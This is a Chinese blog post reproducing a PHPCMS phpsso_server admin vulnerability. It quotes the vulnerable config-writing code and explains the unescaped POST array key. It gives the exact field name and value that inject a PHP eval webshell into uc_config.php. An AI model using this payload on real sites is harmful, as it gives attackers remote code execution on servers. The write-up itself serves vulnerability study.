思路來自於 http://www.cnbraid.com/2016/09/18/phpcms/
這里自己復現了一下,自己寫了一下
因為是后台的,還得登陸兩次。。所以不好用,主要是學習學習
漏洞來自於ROOTDIR/phpsso_server/phpcms/modules/admin/system.php
public function uc() { if (isset($_POST['dosubmit'])) { $data = isset($_POST['data']) ? $_POST['data'] : ''; $data['ucuse'] = isset($_POST['ucuse']) && intval($_POST['ucuse']) ? intval($_POST['ucuse']) : 0; $filepath = CACHE_PATH.'configs'.DIRECTORY_SEPARATOR.'system.php'; $config = include $filepath; $uc_config = '<?php '."\ndefine('UC_CONNECT', 'mysql');\n"; foreach ($data as $k => $v) { $old[] = "'$k'=>'".(isset($config[$k]) ? $config[$k] : $v)."',"; $new[] = "'$k'=>'$v',"; $uc_config .= "define('".strtoupper($k)."', '$v');\n"; } $html = file_get_contents($filepath); $html = str_replace($old, $new, $html); $uc_config_filepath = CACHE_PATH.'configs'.DIRECTORY_SEPARATOR.'uc_config.php'; @file_put_contents($uc_config_filepath, $uc_config); @file_put_contents($filepath, $html); $this->db->insert(array('name'=>'ucenter', 'data'=>array2string($data)), 1,1); showmessage(L('operation_success'), HTTP_REFERER); } $data = array(); $r = $this->db->get_one(array('name'=>'ucenter')); if ($r) { $data = string2array($r['data']); } include $this->admin_tpl('system_uc'); }
來自這段中的
$data = isset($_POST['data']) ? $_POST['data'] : '';
和
foreach ($data as $k => $v) {
$old[] = "'$k'=>'".(isset($config[$k]) ? $config[$k] : $v)."',";
$new[] = "'$k'=>'$v',";
$uc_config .= "define('".strtoupper($k)."', '$v');\n";
}
這里接收post['data']數據中的key,value並寫入配置文件ROOTDIR/phpsso_server/caches/configs/uc_config.php中
在ROOTDIR/phpcms/libs/classes/param.class.php中
public function __construct() { if(!get_magic_quotes_gpc()) { $_POST = new_addslashes($_POST); $_GET = new_addslashes($_GET); $_REQUEST = new_addslashes($_REQUEST); $_COOKIE = new_addslashes($_COOKIE); }
全局過濾了post,但是這里只過濾了value,並沒有過濾key
在這個地方,我們可以構造
name="data[uc_api','11');/*]"
並在Ucenter api 地址輸入:*/eval($_REQUEST[test]);//
就成功寫入了一句話
菜刀成功連接
本文由HackBraid整理總結,原文鏈接:http://www.cnbraid.com/2016/09/18/phpcms/,如需轉載請聯系作者。